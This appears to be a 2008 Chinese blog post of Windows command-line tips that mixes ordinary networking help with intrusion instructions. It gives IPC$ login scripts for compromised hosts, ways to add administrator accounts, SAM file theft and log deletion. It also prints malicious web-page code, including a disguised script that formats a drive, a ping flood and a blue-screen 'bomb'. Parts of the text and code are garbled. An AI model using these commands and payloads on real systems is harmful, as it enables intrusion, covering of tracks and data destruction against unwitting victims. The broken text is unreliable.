乐观向上,大方开朗,热情务实;善与人交流,人际关系良好,待人诚恳;做事认真负责,具有吃苦耐劳、艰苦奋斗的精神;遇事沉着冷静,理智稳重,适应能力强,开拓能力,独爱T-Mac。 上帝的眼泪
( Tue, 23 Sep 2008 22:22:20 +0800 )
Description:
1)如何查看本机所开端口:
用netstat -a —n命令查看!再stat下面有一些英文,我来简单说一下这些英文具体都代表什么
LISTEN:侦听来自远方的TCP端口的连接请求
SYN-SENT:再发送连接请求后等待匹配的连接请求
SYN-RECEIVED:再收到和发送一个连接请求后等待对方对连接请求的确认
ESTABLISHED:代表一个打开的连接
FIN-WAIT-1:等待远程TCP连接中断请求,或先前的连接中断请求的确认
FIN-WAIT-2:从远程TCP等待连接中断请求
CLOSE-WAIT:等待从本地用户发来的连接中断请求
CLOSING:等待远程TCP对连接中断的确认
LAST-ACK:等待原来的发向远程TCP的连接中断请求的确认
TIME-WAIT:等待足够的时间以确保远程TCP接收到连接中断请求的确认
CLOSED:没有任何连接状态
2)如何获得一个IP地址的主机名?
利用ping -a ip 命令查看!再第一行的pinging后面的 『ip』前面的英文就是对方主机名!
同样道理,利用ping machine_name也可以得到对方的ip
获得一个网站的ip地址的方法是:ping
www.***.com
比如想知道sohu的ip,就用ping
来查看就可以了
顺便说一句:如果返回:Reply from *.*.*.*: TTL expired in tra it的话,呵呵,代表TTL(生命周期)在传输过程中过期
什么意思呢?我来解释一下!
导致这个问题出现的原因有两个:1)TTL值太小!TTL值小于你和对方主机之间经过的路由器数目。 2)路由器数量太多,经过路由器的数量大于TTL值!
呵呵,其实这两点是一个意思!只不过说法不同而已!
3)如何查看本机的ip地址?
用ipconfig来查看就可以!
也可以再Windows中的开始菜单,运行中输入winipcfg,同样可以看到自己的ip
ipconfig命令后面如果加一个参数 /all的话,可以得到更加详细的资料,比如DNS、网关等……
4)再使用net命令的时候遇到一些错误代码,如何查看对应的错误信息?
用命令 net helpmsg erorr_code来查看就可以了
比如错误代码为:88
则查看命令为:net helpmsg 88 下面有这个错误代码的中文显示!
5)利用telnet连接到对方主机上,想获得一些系统信息,用什么命令?
set命令可以很好的完成你所需要收集信息的任务的!
方法:再cmd下直接输入set(telnet对方主机以后,也是直接set就可以了~然后能够得到NNNNN多的信息)
再这里,computername:呵呵,还用说么?主机名!
OS=Windows_NT :操作系统的类型哦~
path=C:\perl\bin\ :(perl的解释器位置!)
systemDrive=c: 操作系统盘符!
USERNAME=coldcrysky 当前登陆使用机器的用户
6)跟踪路由器的命令是什么?
tracert 格式:tracert ip
中间会列出所有经过的路由器列表!这些路由器如果是暴露再防火墙外面的话,还可以看到路由的IP哦~呵呵(这里又涉及到了另外一个问题:为什么要把路由放在防火墙后面?原因呢,主要有两点:1)保护路由器!因为现在越来越多的攻击和入侵已经开始瞄准路由器了~如果直接把路由暴露在外面,呵呵,是非常危险的!被DoS了就不好了啊~呵呵,所以要放在防火墙里面;2)为路由器减少负担!如果所有的过滤功能统统都压在路由器上面,呵呵,路由器的负担就太大了!)
当然,利用pathping也可以达到同样效果!格式与tracert一样!
7)简单介绍一下cookie!
cookie,又名小甜点。
它的作用:记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……
最常见的是,大家再登陆论坛(邮箱)的时候,经常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?呵呵,这个就是cookie的作用!
大家在Administrator的cookies目录中可以看到很多的记事本文档吧?这些都是cookie,虽然经过了加密,但是仔细查找的话,仍然能够看到一些敏感信息!况且现在也已经有了专门查看cookie的软件!利用这些软件,你的隐私将不保哦~
那么,如何清除cookie呢?一般情况下,可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就可以清楚掉了~
除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!然后点击清除表单,清除密码~
然后到操作系统目录所在的分区中!进入Wi t(98为windows)目录(当然了,这些都是默认的目录!如果你***的时候改名了,就对应的去相应目录)之后找到Temporary Internet Files目录(2000的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目录下找Temporary Internet Files就可以了~,找到这个文件夹后,打开!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,这些是你浏览过的网页的记录(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!),好了,跑题了~继续说:这些文件是网站的页面记录,直接删除就可以了!
另外,有没有彻底禁止cookie的方法呢?
呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:阻止所有cookie,呵呵,是不是?
另外一种方法:找到Windows目录下的cookies目录!把里面的txt文件全部删除!,最后应该只剩下一个index.dat文件!之后把这个文件夹设置成只读就可以了~
不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底禁止不禁止就看你自己的了~
8)***2000的时候,速度会特别特别特别慢,怎么加快***速度呢?
在DOS上面***,应该用98启动光盘来引导系统!然后按照下面的方法来做,可以提高***速度:
g:\cd windows -------假设G为光驱 windows为98的***目录!
g:\window gt martdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候***2K的话,速度会很快的哦~
9)Windows2K密码忘记了,如何才能进入系统?
Windows2K的用户配置信息和密码保存在SAM文件里!该文件位于:c:\wi t\system32\config目录中!只要删除这个文件就可以了~
另外,在c:\wi t\repair目录中也同样有一个SAM文件(这个是前者的备份!)如果你在登陆肉鸡的时候,copy前面那个目录中的SAM文件,你会发现COPY不下来!呵呵,为什么?因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了!
10)ping不到,tracert不到,但是却能用 tstat显示对方的一些信息,为什么?
因为tracert和ping命令使用的是ICMP协议!而 tstat是通过对方的netbios端口来获得对方的主机信息的!使用的是UDP和TCP协议!如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的!
11)telnet上去后,如何给对方开共享?
开共享的命令如下:net share c=c:\wi t\system 返回共享成功
之后直接利用\\ip\c来访问对方的system目录了~删除共享用
share c /del 命令就可以了
12)如何判断对方的具体操作系统版本?
首先用ver命令查看对方的版本号!
如果是5.00.2195的话,为2K;5.1.2600为XP
从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分!
2K的pro和svr版本区分:
在telnet下,net shart查看启动的服务~如果对方开启了Terminal Services服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~)
XP的pro和home版的区分:
home edition是无法***iis的!所以,可以通过iis服务来判断到底是home版或者是pro了~
当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵
13)如何查看98的随机启动的程序?
在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始--运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是木马!)
除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已!
14)设置了BIOS密码,可是却忘记了,该怎么办?
如果是可以进入Windows的话,可以找找bio wds和cmo wd这两个软件看看~
还有利用DEBUG法:
简单介绍两种:
1)-o 70 16
-o 71 13
2)-o 70 16
-o 71 16
另一种方法:copy法:
copy con cmos.com
输入下面10个字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个cmos.com程序就可以了~
恩,如果不能进入Windows怎么办呢?
简单介绍两种方法:
1)用通用密码:
Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
这是常见的密码,不妨试试~
如果不行的话,可以利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
15)如何自制一个让98蓝屏的炸弹?
恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~
首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!
(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!否则后果自负!
16)如何再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!该工具包含在2K光盘的\su ort\tools文件夹下!里面有***程序,点击后,就***了2K的su ort tools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?,就可以看到帮助了,使用这个命令的格式是:kill pid (pid是进程的ID号!)再任务管理器中可以看到进程的ID号!(不知道有几位朋友用过蓝色火焰?呵呵,用法跟这个一摸一样!还有很多类似的木马、后门软件都有类似的功能!这个是windows自带的大木马『后门工具』而已!)
这时候,有朋友问了,那再命令行下如何查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,还有一个工具叫tlist 看名字就能看出来是干什么的吧?用法更简单!直接输入tlist就可以得到pid遇队形程序的列表了~
那对方机器如果没有***这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\su ort tools目录下面的这两个对应的exe文件上传到对方的wi t\system32目录中就可以了!呵呵~
17)上次说了ping的基本用法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!
这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Optio :
-t Ping the ecifed host until interrupted.(除非人为中止,否则一直ping下去)
-a Resolve addre es to hostnames.(把IP转为主机名)
-n count Number of echo requests to send.(响应请求的数量)
-l size Send buffer size.(封包的大小)
-f Set Don`t Fragment flag in packet.(信息包中无碎片)
-i TTL Time To Live.(时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count ho .
-s count Timestamp for count ho .
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)
比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
18)如何查看本机的DNS服务器?
ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:再cmd下输入netsh,进入到netsh提示符,再输入:int ip 进入到interface i gt; 然后再次输入dump,这时候屏幕上出现当前连接的配置情况了
这里必须介绍一下netsh到底是作什么用的!这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:
1)查看本机IP:首先键入netsh,再netsh提示符下输入:interface 回车 之后:ip 回车 再之后:show addre 回车 这样,就可以看到当前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)
2)修改网络配置:接着上面的命令,我们使用:set addre name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0,这样就修改了当前的IP地址,用show addre 来看看(或者用ipconfig)
3)显示一个完整的网络配置教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!例如:再interface i gt;状态下输入:dump,会显示一个清单,显示所有本地连接(不管你是否使用~)与netstat -an不完全一样!
这就是netsh的简单介绍和最基础的用法!希望大家能够掌握!还可以输入?来查看帮助!(要在netsh提示符下才能查看帮助啊~)
19)肉鸡上的部分文件无法删除,怎么办?
如果对方的文件夹是只读的话,会出现拒绝访问的字样!这时候,我们可以再del命令后面加上/f参数来删除!
20)再说一个可以限制用户登陆时间的命令!
再net命令中就可以实现这样的功能!具体方法如下:
假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了)
在此,特别提醒各位:命令中:星期日才是一周的开始!!!不要当成星期一!
光说了怎么设置,如果想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都可以登陆的状态)
看我的:net user coldcrysky /time:all --这样就可以了~
22)如何删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~
之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~
23)139端口的又一用法
呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
如果你使用NT主机的话,那你可要注意了!
重启NT主机的方法如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ "pa word" /user:"username"
建立一个IPC连接
2:net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘
3:copy c on h:\reboot.bat
Iisreset /reboot
在对方的C盘上生成一个能重启机器的文件
4:net time \\XXX.XXX.XXX.XXX
得到对方机器时间
5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间!
6:at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务
7:等对方重启好了~
上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include "stdio.h"
#include "windows.h"
int main()
文件://定义重启的时候发送给所有用户的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net" 文件://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://因为上面的重启不成功,所以需要调整本进程的特权
HANDLE hToke TOKEN_PRIVILEGES tk if(!OpenProce Token(GetCurrentProce (),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&am hToken)) return FALSE;
文件://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&am tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&am tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判断是NT内核还是9X内核,选择用不同的方式
if(!GetVersion()&am 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;
对了,再次说明啊,别用本文提到的方法搞破坏,小心***叔叔打PP~呵呵
24)利用批处理文件来建立一个记录3389登陆者信息的记录器
由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:
建立一个批处理文件:内容如下:
@echo off
date/t c:\3389log.txt
:TS3389
time/t c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" c:\3389log.txt
goto :TS3389
之后保存!
如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵
25)网络命令小节
A、NET命令:
IPC连接:格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接~』
net use \\对方IP\ipc$ /delete 『断开连接~』
以下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』
net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
B、AT命令:
查看远程机时间:net time \\对方IP
加入一项新任务:
at \\对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』
C、TELNET命令:
telnet 对方IP 端口 『作用不用我说了吧???』
D、FTP命令:
登陆:ftp 对方网址(IP地址)
上传文件:get 文件在本机完整路径 对方文件存放完整路径
下载文件:put 对方文件完整路径 本机存放文件路径
E、COPY命令:
在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令:
主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!
G、NBTSTAT命令: tstat -A 对方IP (这个A大写)
『在其中显示前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』
H、SHUTDOWN命令:
『用来关闭对方NT服务的命令』格式如下:
shutdown \\IP地址 t:20
『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』
I、DIR命令:
还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)
J、ECHO命令:
echo coldcrysky index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件属性用,格式:
Attrib -r index.htm 『去掉只读属性』(+- 分别代表增加和减少)
L、DEL命令:
『删除日志的时候用!』
del c:\wi t\system32\logfiles\*.*
del c:\wi t\system32\config\*.evt
del c:\wi t\system32\dtclog\*.*
del c:\wi t\system32\*.log
del c:\wi t\system32\*.txt
del c:\wi t\*.txt
del c:\wi t\*.log
M、PING命令:
-t :ping制定IP,知道网络断开或按CTRL+C结束!
-a :解释PING IP的主机名
-n count :发送count指定的ECHO数据包,默认为4个!
26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的相关命令稍微介绍一下!)
我要说的命令就是:开启服务和停止服务的net start and net stop
这两个命令大多数朋友已经很熟悉了吧?不过为了方便更多的菜鸟能看明白我要说的意思,不用再看其他相关文章,所以我简单说两句:net start是开启服务!那么,如何开启呢?比如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net start telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!好像是一句废话
OK,有了这个前提后,下面就继续介绍:那么,net start和net stop到底能开启什么服务?其实这点也不需要你强记,记住这个命令就可以了:net help start和net help stop,这两个会显示出你所能开启的服务有那些~~
这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”,那么当这个命令使用net start和net stop的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!如果服务名称中不带空格,你可以不用带这个引号!!!这点是我强调的问题!大家一定不要忘记了!『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop后面的服务名必须带空格是错误的!明白原因了吧?』
27)关于双系统的两个问题:
A、如何在双系统(98、2000)中安全删除2K?
先制作一张Windows 98 的启动软盘,再用它启动你的计算机,运行sys命令恢复Windows 98引导记录后,再运行fdisk/mbr恢复主引导记录,完成后进入Windows 98,把wi t 和system volumn information 目录删除,再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
B、 Windows 98/XP双系统启动菜单修复
1.修复前,在BIOS中设置从光驱启动。用Windows XP***盘启动电脑,在加载必要的驱动后,出现Windows XP的***界面。有三个选项:
(1)要现在开始***Windows XP,请按“Enter”键。
(2)要用“恢复控制台”修复Windows XP***,按“R”键。
(3)要退出***程序,不***Windows XP,按“F3”键;
2. 按“R”键,进入“Microsoft Windows XP (TM) 故障恢复控制台”界面;故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已***的Windows XP系统文件,然后显示搜寻结果,并询问“要登录到哪个Windows XP***(要取消,请按Enter)”,选择1. D:\Windows,回车,系统会再询问“管理员密码”,再键入***Windows XP时设置的管理员密码,回车,出现D:\Windows〉,这时需要输入修复命令Fixboot,后面的参数为启动扇区要写入的磁盘盘符,这里填入C:,回车。修复完成,键入Exit退出。重启后就会看到久违的双重启动菜单了。并且,这样修复后基本不产生垃圾文件。
因为这两个问题是非常非常普遍的,所以我就收集到这里了~
28)这里说几个主页恶意代码:『并不是让大家把这些代码加入到自己的主页中!只是希望大家能了解恶意代码,起到更好的防护作用!』
A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!
预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~
B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000"
说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……
C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
if (window.top.moveBy){
for (i = 1;i 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
说明:是windows9x的设备名称解析漏洞!
WINDOWS9x的\con\con设备名称解析漏洞允许用户进行攻击,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy coldcrysky.txtcon系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用\CON\CON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~
D、格式化硬盘:(最恐怖的~~~慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)
scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm";
scr.Doc=""
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();
说明:当您浏览了网页,会把startup.hta文件写入启动文件夹,并提示WINDOWS正在删除临时文件!实际上是在格式化你的D盘,代码中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为:Windows Scripting Host Shell Object。代码中的:WSH全称是:Windows Scripting Host,是微软的一种基于32位系统平台与语言无关的教本解释机制,它使得脚本能在WINDOWS桌面或命令提示符下运行~WSH所对应的程序WScript.exe是一个脚本语言解释器,位于WINDOWS所在文件夹下,所以它可以像执行批处理文件一样执行WSH脚本程序~
解决方法:1)更新您的浏览器,使用最新的浏览器上网!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用启动菜单。
3)吧format.com改名
4)禁用WSH。具体方法:在win98中,从添加删除程序中点击WINDOWS***程序,打开附件一项,将WINDOWS SCRIPTING HOST前面的选项去掉,就可以卸载掉WSH了~~~win2000和xp的用户可以在我的电脑-工具菜单-文件夹选项-选择文件类型,找到VBS VBSCRIPT FILE选项,点击删除!
29)系统自带的系统工具
其实无论大家从什么地方,什么方法找到一些好用的工具,都不如Windows自带的工具用着方便(假设你区的地方正好不能上网,而你又没有准备好这些工具,那怎么办?呵呵,不用着急,用好下面几个Windows自带的小工具,可以使你事半功倍!)
1、msinfo32.exe
位于C:\Program Files\Common Files
Microsoft Shared\Msinfo\msinfo32.exe,显示计算机中的有关系统信息,可用其诊断、解决计算机问题并查看远程系统所生成的系统报告。
2、drwatson.exe --这个工具给我特别的亲密感觉:第一次使用这个工具是在看了LK007大哥给cool兄弟的回复以后,我马上试验~果然很有意思!LK007不愧是大哥!现在想起来都佩服不已~~~
位于C: \Windows \drwatson.exe,当某个应用程序在运行过程中出错时,它就会将出错的程序以及出错的内存地址一一记录下来,并保存为Windows的Drwatson子目录下的*.wlg记录文件。
3、sfc.exe
位于C:\Windows\System\sfc.exe,用于自动搜索被改变、删除或损坏了的系统文件。
4、msconfig.exe
位于C:\Windows\System\msconfig.exe,通过修改启动方式以及启动时运行哪些应用程序等系统配置,从而达到快速排除故障的目的。
5、scanreg.exe
位于C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本),用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件,防止因注册表数据被破坏而导致的系统故障。
6、vcmui.exe
位于C:\Windows\vcmui.exe,在后台自动将被覆盖的驱动程序备份下来,当我们***的新驱动出错时可用它进行恢复。
7、winrep.exe
位于C:\Windows\winrep.exe,能自动收集有关系统信息并提示用户输入故障所在,帮我们编写一篇完整的“求援”报告,并将其发送给有关技术维护人员,简化“求援”操作。
这七个Windows自带的小程序可以在开始菜单--运行中直接输入文件名(无需输入扩展名)调出该程序!
30)批处理在入侵中的几则妙用!
A、简化IPC$登陆肉鸡的操作:
用记事本建立一个名字为:ipcruqin.bat的批处理文件,内容如下:
@net use \\%1\ipc$ %3 /u:"%2"
@echo OK!已经成功建立连接
之后,大家在CMD下输入:ipcruqin.bat 肉鸡IP 肉鸡的admin帐号/用户的密码。就可以登陆上去了,而不需要那一大长串的命令了!
B、批处理轰炸对方电脑:
打开一记事本,在里面输入如下内容:
@echo 正在轰炸中……
@net send %1 %2
@if errorlevel 1 goto over
goto start
@echo 发送失败
将其保存为bat格式的文件即可,使用方法:*.bat(该批处理文件的名字)+ 空格 + 目标IP + 空格 + 你要对他说得话!
这次先简单介绍这三个!等下次有机会再给大家介绍更多的批处理文件的用途!
31)再说几个非常简单实用的DOS命令(工具):
A、fport.exe --查看那些端口都是那些程序使用的命令。
B、netstat -an --查看那些端口于外部的IP连接。比如这里显示 :23 XX.XX.XX.XX 而你又没有开23端口,那么,呵呵……还用我说么?
C、letmain.exe \\ip -admin -d --列出本机的administrators组的用户名查看是否有异常。
D、 list.exe --列出进程
E、 kill.exe --杀掉进程,有时候再任务管理器中无法终止程序,那就用这个工具来停止进程。
F、login.exe --列出当前有那些用户登陆再你的机器上。
ping命令详解
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Optio :
-t Ping the ecified host until sto ed.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主机,直到你按下Control-C。
此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。
-a Resolve addre es to hostnames.
解析计算机NetBios名。
示例:C:\> ing -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 timeping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% lo ),A roximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)
C:\> ing -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 timeping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)
Pinging 202.96.105.101 with 32 bytes of data:
